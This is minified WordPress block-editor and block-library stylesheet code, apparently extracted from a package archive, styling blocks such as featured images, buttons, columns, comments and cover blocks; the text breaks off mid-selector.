.wp-block-post-featured-image__placeholder:where([style*=border-right-color]),.wp-block-post-featured-image img:where([style*=border-right-color]){ border-right-style:solid; } .wp-block-post-featured-image .components-placeholder:where([style*=border-bottom-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-bottom-color]),.wp-block-post-featured-image img:where([style*=border-bottom-color]){ border-bottom-style:solid; } .wp-block-post-featured-image .components-placeholder:where([style*=border-left-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-left-color]),.wp-block-post-featured-image img:where([style*=border-left-color]){ border-left-style:solid; } .wp-block-post-featured-image .components-placeholder:where([style*=border-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-width]),.wp-block-post-featured-image img:where([style*=border-width]){ border-style:solid; } .wp-block-post-featured-image .components-placeholder:where([style*=border-top-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-top-width]),.wp-block-post-featured-image img:where([style*=border-top-width]){ border-top-style:solid; } .wp-block-post-featured-image .components-placeholder:where([style*=border-right-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-right-width]),.wp-block-post-featured-image img:where([style*=border-right-width]){ border-right-style:solid; } .wp-block-post-featured-image .components-placeholder:where([style*=border-bottom-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-bottom-width]),.wp-block-post-featured-image img:where([style*=border-bottom-width]){ border-bottom-style:solid; } .wp-block-post-featured-image .components-placeholder:where([style*=border-left-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-left-width]),.wp-block-post-featured-image img:where([style*=border-left-width]){ border-left-style:solid; } .wp-block-post-featured-image[style*=height] .components-placeholder{ height:100%; min-height:48px; min-width:48px; width:100%; } .wp-block-post-featured-image>a{ pointer-events:none; } .wp-block-post-featured-image.is-selected .components-placeholder.has-illustration .components-button,.wp-block-post-featured-image.is-selected .components-placeholder.has-illustration .components-placeholder__instructions,.wp-block-post-featured-image.is-selected .components-placeholder.has-illustration .components-placeholder__label{ opacity:1; pointer-events:auto; } .wp-block-post-featured-image.is-transient{ position:relative; } .wp-block-post-featured-image.is-transient img{ opacity:.3; } .wp-block-post-featured-image.is-transient .components-spinner{ left:50%; position:absolute; top:50%; transform:translate(-50%, -50%); } div[data-type="core/post-featured-image"] img{ display:block; height:auto; max-width:100%; } .wp-block-post-comments-form *{ pointer-events:none; } .wp-block-post-comments-form .block-editor-warning *{ pointer-events:auto; } .wp-element-button{ cursor:revert; } .wp-element-button[role=textbox]{ cursor:text; } .block-library-poster-image__container{ position:relative; } .block-library-poster-image__container:focus .block-library-poster-image__actions,.block-library-poster-image__container:focus-within .block-library-poster-image__actions,.block-library-poster-image__container:hover .block-library-poster-image__actions{ opacity:1; } .block-library-poster-image__container .block-library-poster-image__actions.block-library-poster-image__actions-select{ margin-top:16px; opacity:1; } .block-library-poster-image__container .components-drop-zone__content{ border-radius:2px; } .block-library-poster-image__container .components-drop-zone .components-drop-zone__content-inner{ align-items:center; display:flex; gap:8px; } .block-library-poster-image__container .components-drop-zone .components-drop-zone__content-inner .components-drop-zone__content-icon{ margin:0; } .block-library-poster-image__container .components-spinner{ left:50%; margin-left:-9px; margin-top:-9px; position:absolute; top:50%; } .block-library-poster-image__preview{ display:flex; height:auto !important; justify-content:center; min-height:40px; outline:1px solid #0000001a; outline-offset:-1px; overflow:hidden; padding:0; width:100%; } .block-library-poster-image__preview .block-library-poster-image__preview-image{ aspect-ratio:2/1; object-fit:cover; object-position:50% 50%; width:100%; } .block-library-poster-image__actions:not(.block-library-poster-image__actions-select){ bottom:0; opacity:0; padding:8px; position:absolute; } @media not (prefers-reduced-motion){ .block-library-poster-image__actions:not(.block-library-poster-image__actions-select){ transition:opacity 50ms ease-out; } } .block-library-poster-image__actions:not(.block-library-poster-image__actions-select) .block-library-poster-image__action{ backdrop-filter:blur(16px) saturate(180%); background:#ffffffbf; } .block-library-poster-image__actions .block-library-poster-image__action{ flex-grow:1; justify-content:center; } :root .editor-styles-wrapper .has-very-light-gray-background-color{ background-color:#eee; } :root .editor-styles-wrapper .has-very-dark-gray-background-color{ background-color:#313131; } :root .editor-styles-wrapper .has-very-light-gray-color{ color:#eee; } :root .editor-styles-wrapper .has-very-dark-gray-color{ color:#313131; } :root .editor-styles-wrapper .has-vivid-green-cyan-to-vivid-cyan-blue-gradient-background{ background:linear-gradient(135deg, #00d084, #0693e3); } :root .editor-styles-wrapper .has-purple-crush-gradient-background{ background:linear-gradient(135deg, #34e2e4, #4721fb 50%, #ab1dfe); } :root .editor-styles-wrapper .has-hazy-dawn-gradient-background{ background:linear-gradient(135deg, #faaca8, #dad0ec); } :root .editor-styles-wrapper .has-subdued-olive-gradient-background{ background:linear-gradient(135deg, #fafae1, #67a671); } :root .editor-styles-wrapper .has-atomic-cream-gradient-background{ background:linear-gradient(135deg, #fdd79a, #004a59); } :root .editor-styles-wrapper .has-nightshade-gradient-background{ background:linear-gradient(135deg, #330968, #31cdcf); } :root .editor-styles-wrapper .has-midnight-gradient-background{ background:linear-gradient(135deg, #020381, #2874fc); } :where(.editor-styles-wrapper) .has-regular-font-size{ font-size:16px; } :where(.editor-styles-wrapper) .has-larger-font-size{ font-size:42px; } :where(.editor-styles-wrapper) iframe:not([frameborder]){ border:0; }PK!8p>> dist/block-library/style.min.cssnuȯ@charset "UTF-8";.wp-block-accordion{box-sizing:border-box}.wp-block-accordion-item.is-open>.wp-block-accordion-heading .wp-block-accordion-heading__toggle-icon{transform:rotate(45deg)}@media (prefers-reduced-motion:no-preference){.wp-block-accordion-item{transition:grid-template-rows .3s ease-out}.wp-block-accordion-item>.wp-block-accordion-heading .wp-block-accordion-heading__toggle-icon{transition:transform .2s ease-in-out}}.wp-block-accordion-heading__toggle{align-items:center;background:none;border:none;color:inherit;cursor:pointer;display:flex;font-family:inherit;font-size:inherit;font-style:inherit;font-weight:inherit;letter-spacing:inherit;line-height:inherit;overflow:hidden;padding:var(--wp--preset--spacing--20,1em) 0;text-align:inherit;text-decoration:inherit;text-transform:inherit;width:100%;word-spacing:inherit}.wp-block-accordion-heading__toggle:not(:focus-visible){outline:none}.wp-block-accordion-heading__toggle:hover .wp-block-accordion-heading__toggle-title{text-decoration:underline}.wp-block-accordion-heading__toggle-title{flex:1}.wp-block-accordion-heading__toggle-icon{align-items:center;display:flex;height:1.2em;justify-content:center;width:1.2em}.wp-block-accordion-panel[aria-hidden=true],.wp-block-accordion-panel[inert]{display:none;margin-block-start:0}.wp-block-archives{box-sizing:border-box}.wp-block-archives-dropdown label{display:block}.wp-block-avatar{line-height:0}.wp-block-avatar,.wp-block-avatar img{box-sizing:border-box}.wp-block-avatar.aligncenter{text-align:center}.wp-block-audio{box-sizing:border-box}.wp-block-audio :where(figcaption){margin-bottom:1em;margin-top:.5em}.wp-block-audio audio{min-width:300px;width:100%}.wp-block-breadcrumbs{box-sizing:border-box}.wp-block-breadcrumbs ol{flex-wrap:wrap;list-style:none}.wp-block-breadcrumbs li,.wp-block-breadcrumbs ol{align-items:center;display:flex;margin:0;padding:0}.wp-block-breadcrumbs li:not(:last-child):after{content:var(--separator,"/");margin:0 .5em;opacity:.7}.wp-block-breadcrumbs span{color:inherit}.wp-block-button__link{align-content:center;box-sizing:border-box;cursor:pointer;display:inline-block;height:100%;text-align:center;word-break:break-word}.wp-block-button__link.aligncenter{text-align:center}.wp-block-button__link.alignright{text-align:right}:where(.wp-block-button__link){border-radius:9999px;box-shadow:none;padding:calc(.667em + 2px) calc(1.333em + 2px);text-decoration:none}.wp-block-button[style*=text-decoration] .wp-block-button__link{text-decoration:inherit}.wp-block-buttons>.wp-block-button.has-custom-width{max-width:none}.wp-block-buttons>.wp-block-button.has-custom-width .wp-block-button__link{width:100%}.wp-block-buttons>.wp-block-button.has-custom-font-size .wp-block-button__link{font-size:inherit}.wp-block-buttons>.wp-block-button.wp-block-button__width-25{width:calc(25% - var(--wp--style--block-gap, .5em)*.75)}.wp-block-buttons>.wp-block-button.wp-block-button__width-50{width:calc(50% - var(--wp--style--block-gap, .5em)*.5)}.wp-block-buttons>.wp-block-button.wp-block-button__width-75{width:calc(75% - var(--wp--style--block-gap, .5em)*.25)}.wp-block-buttons>.wp-block-button.wp-block-button__width-100{flex-basis:100%;width:100%}.wp-block-buttons.is-vertical>.wp-block-button.wp-block-button__width-25{width:25%}.wp-block-buttons.is-vertical>.wp-block-button.wp-block-button__width-50{width:50%}.wp-block-buttons.is-vertical>.wp-block-button.wp-block-button__width-75{width:75%}.wp-block-button.is-style-squared,.wp-block-button__link.wp-block-button.is-style-squared{border-radius:0}.wp-block-button.no-border-radius,.wp-block-button__link.no-border-radius{border-radius:0!important}:root :where(.wp-block-button .wp-block-button__link.is-style-outline),:root :where(.wp-block-button.is-style-outline>.wp-block-button__link){border:2px solid;padding:.667em 1.333em}:root :where(.wp-block-button .wp-block-button__link.is-style-outline:not(.has-text-color)),:root :where(.wp-block-button.is-style-outline>.wp-block-button__link:not(.has-text-color)){color:currentColor}:root :where(.wp-block-button .wp-block-button__link.is-style-outline:not(.has-background)),:root :where(.wp-block-button.is-style-outline>.wp-block-button__link:not(.has-background)){background-color:initial;background-image:none}.wp-block-buttons{box-sizing:border-box}.wp-block-buttons.is-vertical{flex-direction:column}.wp-block-buttons.is-vertical>.wp-block-button:last-child{margin-bottom:0}.wp-block-buttons>.wp-block-button{display:inline-block;margin:0}.wp-block-buttons.is-content-justification-left{justify-content:flex-start}.wp-block-buttons.is-content-justification-left.is-vertical{align-items:flex-start}.wp-block-buttons.is-content-justification-center{justify-content:center}.wp-block-buttons.is-content-justification-center.is-vertical{align-items:center}.wp-block-buttons.is-content-justification-right{justify-content:flex-end}.wp-block-buttons.is-content-justification-right.is-vertical{align-items:flex-end}.wp-block-buttons.is-content-justification-space-between{justify-content:space-between}.wp-block-buttons.aligncenter{text-align:center}.wp-block-buttons:not(.is-content-justification-space-between,.is-content-justification-right,.is-content-justification-left,.is-content-justification-center) .wp-block-button.aligncenter{margin-left:auto;margin-right:auto;width:100%}.wp-block-buttons[style*=text-decoration] .wp-block-button,.wp-block-buttons[style*=text-decoration] .wp-block-button__link{text-decoration:inherit}.wp-block-buttons.has-custom-font-size .wp-block-button__link{font-size:inherit}.wp-block-buttons .wp-block-button__link{width:100%}.wp-block-button.aligncenter,.wp-block-calendar{text-align:center}.wp-block-calendar td,.wp-block-calendar th{border:1px solid;padding:.25em}.wp-block-calendar th{font-weight:400}.wp-block-calendar caption{background-color:inherit}.wp-block-calendar table{border-collapse:collapse;width:100%}.wp-block-calendar table.has-background th{background-color:inherit}.wp-block-calendar table.has-text-color th{color:inherit}.wp-block-calendar :where(table:not(.has-text-color)){color:#40464d}.wp-block-calendar :where(table:not(.has-text-color)) td,.wp-block-calendar :where(table:not(.has-text-color)) th{border-color:#ddd}:where(.wp-block-calendar table:not(.has-background) th){background:#ddd}.wp-block-categories{box-sizing:border-box}.wp-block-categories.alignleft{margin-right:2em}.wp-block-categories.alignright{margin-left:2em}.wp-block-categories.wp-block-categories-dropdown.aligncenter{text-align:center}.wp-block-categories .wp-block-categories__label{display:block;width:100%}.wp-block-code{box-sizing:border-box}.wp-block-code code{ /*!rtl:begin:ignore*/direction:ltr;display:block;font-family:inherit;overflow-wrap:break-word;text-align:initial;white-space:pre-wrap /*!rtl:end:ignore*/}.wp-block-columns{box-sizing:border-box;display:flex;flex-wrap:wrap!important}@media (min-width:782px){.wp-block-columns{flex-wrap:nowrap!important}}.wp-block-columns{align-items:normal!important}.wp-block-columns.are-vertically-aligned-top{align-items:flex-start}.wp-block-columns.are-vertically-aligned-center{align-items:center}.wp-block-columns.are-vertically-aligned-bottom{align-items:flex-end}@media (max-width:781px){.wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column{flex-basis:100%!important}}@media (min-width:782px){.wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column{flex-basis:0;flex-grow:1}.wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column[style*=flex-basis]{flex-grow:0}}.wp-block-columns.is-not-stacked-on-mobile{flex-wrap:nowrap!important}.wp-block-columns.is-not-stacked-on-mobile>.wp-block-column{flex-basis:0;flex-grow:1}.wp-block-columns.is-not-stacked-on-mobile>.wp-block-column[style*=flex-basis]{flex-grow:0}:where(.wp-block-columns){margin-bottom:1.75em}:where(.wp-block-columns.has-background){padding:1.25em 2.375em}.wp-block-column{flex-grow:1;min-width:0;overflow-wrap:break-word;word-break:break-word}.wp-block-column.is-vertically-aligned-top{align-self:flex-start}.wp-block-column.is-vertically-aligned-center{align-self:center}.wp-block-column.is-vertically-aligned-bottom{align-self:flex-end}.wp-block-column.is-vertically-aligned-stretch{align-self:stretch}.wp-block-column.is-vertically-aligned-bottom,.wp-block-column.is-vertically-aligned-center,.wp-block-column.is-vertically-aligned-top{width:100%}.wp-block-post-comments{box-sizing:border-box}.wp-block-post-comments .alignleft{float:left}.wp-block-post-comments .alignright{float:right}.wp-block-post-comments .navigation:after{clear:both;content:"";display:table}.wp-block-post-comments .commentlist{clear:both;list-style:none;margin:0;padding:0}.wp-block-post-comments .commentlist .comment{min-height:2.25em;padding-left:3.25em}.wp-block-post-comments .commentlist .comment p{font-size:1em;line-height:1.8;margin:1em 0}.wp-block-post-comments .commentlist .children{list-style:none;margin:0;padding:0}.wp-block-post-comments .comment-author{line-height:1.5}.wp-block-post-comments .comment-author .avatar{border-radius:1.5em;display:block;float:left;height:2.5em;margin-right:.75em;margin-top:.5em;width:2.5em}.wp-block-post-comments .comment-author cite{font-style:normal}.wp-block-post-comments .comment-meta{font-size:.875em;line-height:1.5}.wp-block-post-comments .comment-meta b{font-weight:400}.wp-block-post-comments .comment-meta .comment-awaiting-moderation{display:block;margin-bottom:1em;margin-top:1em}.wp-block-post-comments .comment-body .commentmetadata{font-size:.875em}.wp-block-post-comments .comment-form-author label,.wp-block-post-comments .comment-form-comment label,.wp-block-post-comments .comment-form-email label,.wp-block-post-comments .comment-form-url label{display:block;margin-bottom:.25em}.wp-block-post-comments .comment-form input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments .comment-form textarea{box-sizing:border-box;display:block;width:100%}.wp-block-post-comments .comment-form-cookies-consent{display:flex;gap:.25em}.wp-block-post-comments .comment-form-cookies-consent #wp-comment-cookies-consent{margin-top:.35em}.wp-block-post-comments .comment-reply-title{margin-bottom:0}.wp-block-post-comments .comment-reply-title :where(small){font-size:var(--wp--preset--font-size--medium,smaller);margin-left:.5em}.wp-block-post-comments .reply{font-size:.875em;margin-bottom:1.4em}.wp-block-post-comments input:not([type=submit]),.wp-block-post-comments textarea{border:1px solid #949494;font-family:inherit;font-size:1em}.wp-block-post-comments input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments textarea{padding:calc(.667em + 2px)}:where(.wp-block-post-comments input[type=submit]){border:none}.wp-block-comments{box-sizing:border-box}.wp-block-comments-pagination>.wp-block-comments-pagination-next,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers,.wp-block-comments-pagination>.wp-block-comments-pagination-previous{font-size:inherit}.wp-block-comments-pagination .wp-block-comments-pagination-previous-arrow{display:inline-block;margin-right:1ch}.wp-block-comments-pagination .wp-block-comments-pagination-previous-arrow:not(.is-arrow-chevron){transform:scaleX(1)}.wp-block-comments-pagination .wp-block-comments-pagination-next-arrow{display:inline-block;margin-left:1ch}.wp-block-comments-pagination .wp-block-comments-pagination-next-arrow:not(.is-arrow-chevron){transform:scaleX(1)}.wp-block-comments-pagination.aligncenter{justify-content:center}.wp-block-comment-template{box-sizing:border-box;list-style:none;margin-bottom:0;max-width:100%;padding:0}.wp-block-comment-template li{clear:both}.wp-block-comment-template ol{list-style:none;margin-bottom:0;max-width:100%;padding-left:2rem}.wp-block-comment-template.alignleft{float:left}.wp-block-comment-template.aligncenter{margin-left:auto;margin-right:auto;width:fit-content}.wp-block-comment-template.alignright{float:right}.wp-block-comment-date{box-sizing:border-box}.comment-awaiting-moderation{display:block;font-size:.875em;line-height:1.5}.wp-block-comment-author-name,.wp-block-comment-content,.wp-block-comment-edit-link,.wp-block-comment-reply-link{box-sizing:border-box}.wp-block-cover,.wp-block-cover-image{align-items:center;background-position:50%;box-sizing:border-box;display:flex;justify-content:center;min-height:430px;overflow:hidden;overflow:clip;padding:1em;position:relative}.wp-block-cover .has-background-dim:not([class*=-background-color]),.wp-block-cover-image .has-background-dim:not([class*=-background-color]),.wp-block-cover-image.has-background-dim:not([class*=-background-color]),.wp-block-cover.has-background-dim:not([class*=-background-color]){background-color:#000}.wp-block-cover .has-background-dim.has-background-gradient,.wp-block-cover-image .has-background-dim.has-background-gradient{background-color:initial}.wp-block-cover-image.has-background-dim:before,.wp-block-cover.has-background-dim:before{background-color:inherit;content:""}.wp-block-cover .wp-block-cover__background,.wp-block-cover .wp-block-cover__gradient-background,.wp-block-cover-image .wp-block-cover__background,.wp-block-cover-image .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim:not(.has-background-gradient):before,.wp-block-cover.has-background-dim:not(.has-background-gradient):before{bottom:0;left:0;opacity:.5;position:absolute;right:0;top:0}.wp-block-cover-image.has-background-dim.has-background-dim-10 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-10 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-10:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-10 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-10 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-10:not(.has-background-gradient):before{opacity:.1}.wp-block-cover-image.has-background-dim.has-background-dim-20 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-20 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-20:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-20 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-20 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-20:not(.has-background-gradient):before{opacity:.2}.wp-block-cover-image.has-background-dim.has-background-dim-30 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-30 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-30:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-30 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-30 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-30:not(.has-background-gradient):before{opacity:.3}.wp-block-cover-image.has-background-dim.has-background-dim-40 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-40 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-40:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-40 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-40 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-40:not(.has-background-gradient):before{opacity:.4}.wp-block-cover-image.has-background-dim.has-background-dim-50 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-50 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-50:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-50 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-50 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-50:not(.has-background-gradient):before{opacity:.5}.wp-block-cover-image.has-background-dim.has-background-dim-60 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-60 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-60:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-60 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-60 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-60:not(.has-background-gradient):before{opacity:.6}.wp-block-cover-image.has-background-dim.has-background-dim-70 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-70 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-70:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-70 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-70 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-70:not(.has-background-gradient):before{opacity:.7}.wp-block-cover-image.has-background-dim.has-background-dim-80 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-80 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-80:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-80 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-80 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-80:not(.has-background-gradient):before{opacity:.8}.wp-block-cover-image.has-background-dim.has-background-dim-90 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-90 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-90:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-90 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-90 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-90:not(.has-background-gradient):before{opacity:.9}.wp-block-cover-image.has-background-dim.has-background-dim-100 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-100 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-100:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-100 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-100 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-100:not(.has-background-gradient):before{opacity:1}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-0,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-0,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-0,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-0{opacity:0}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-10,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-10,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-10,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-10{opacity:.1}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-20,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-20,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-20,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-20{opacity:.2}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-30,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-30,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-30,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-30{opacity:.3}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-40,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-40,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-40,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-40{opacity:.4}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-50,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-50,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-50,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-50{opacity:.5}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-60,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-60,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-60,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-60{opacity:.6}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-70,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-70,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-70,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-70{opacity:.7}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-80,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-80,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-80,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-80{opacity:.8}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-90,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-90,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-90,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-90{opacity:.9}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-100,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-100,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-100,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-100{opacity:1}.wp-block-cover-image.alignleft,.wp-block-cover-image.alignright,.wp-block-cover.alignleft,.wp-block-cover.alignright{max-width:420px;width:100%}.wp-block-cover-image.aligncenter,.wp-block-cover-image.alignleft,.wp-block-cover-image.alignright,.wp-block-cover.aligncenter,.wp-block-cover.alignleft,.wp-block-cover.alignright{display:flex}.wp-block-cover .wp-block-cover__inner-container,.wp-block-cover-image .wp-block-cover__inner-container{color:inherit;position:relative;width:100%}.wp-block-cover-image.is-position-top-left,.wp-block-cover.is-position-top-left{align-items:flex-start;justify-content:flex-start}.wp-block-cover-image.is-position-top-center,.wp-block-cover.is-position-top-center{align-items:flex-start;justify-content:center}.wp-block-cover-image.is-position-top-right,.wp-block-cover.is-position-top-right{align-items:flex-start;justify-content:flex-end}.wp-block-cover-image.is-position-center-left,.wp-block-cover.is-position-center-left{align-items:center;justify-content:flex-start}.wp-block-cover-image.is-position-center-center,.wp-block-cover.is-position-center-center{align-items:center;justify-content:center}.wp-block-cover-image.is-position-center-right,.wp-block-cover.is-position-center-right{align-items:center;justify-content:flex-end}.wp-block-cover-image.is-position-bottom-left,.wp-block-cover.is-position-bottom-left{align-items:flex-end;justify-content:flex-start}.wp-block-cover-image.is-position-bottom-center,.wp-block-cover.is-position-bottom-center{align-items:flex-end;justify-content:center}.wp-block-cover-image.is-position-bottom-right,.wp-block-cover.is-position-bottom-right{align-items:flex-end;justify-content:flex-end}.wp-block-cover-image.has-custom-content-position.has-custom-content-position .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position .wp-block-cover__inner-container{margin:0}.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-bottom-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-bottom-right .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-center-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-center-right .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-top-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-top-right .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-bottom-left .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-bottom-right .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-center-left .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-center-right .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-top-left .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-top-right .wp-block-cover__inner-container{margin:0;width:auto}.wp-block-cover .wp-block-cover__image-background,.wp-block-cover video.wp-block-cover__video-background,.wp-block-cover-image .wp-block-cover__image-background,.wp-block-cover-image video.wp-block-cover__video-background{border:none;bottom:0;box-shadow:none;height:100%;left:0;margin:0;max-height:none;max-width:none;object-fit:cover;outline:none;padding:0;position:absolute;right:0;top:0;width:100%}.wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{background-attachment:fixed;background-repeat:no-repeat;background-size:cover}@supports (-webkit-touch-callout:inherit){.wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{background-attachment:scroll}}@media (prefers-reduced-motion:reduce){.wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{background-attachment:scroll}}.wp-block-cover-image.is-repeated,.wp-block-cover.is-repeated,.wp-block-cover__image-background.is-repeated,video.wp-block-cover__video-background.is-repeated{background-repeat:repeat;background-size:auto}.wp-block-cover-image-text,.wp-block-cover-image-text a,.wp-block-cover-image-text a:active,.wp-block-cover-image-text a:focus,.wp-block-cover-image-text a:hover,.wp-block-cover-text,.wp-block-cover-text a,.wp-block-cover-text a:active,.wp-block-cover-text a:focus,.wp-block-cover-text a:hover,section.wp-block-cover-image h2,section.wp-block-cover-image h2 a,section.wp-block-cover-image h2 a:active,section.wp-block-cover-image h2 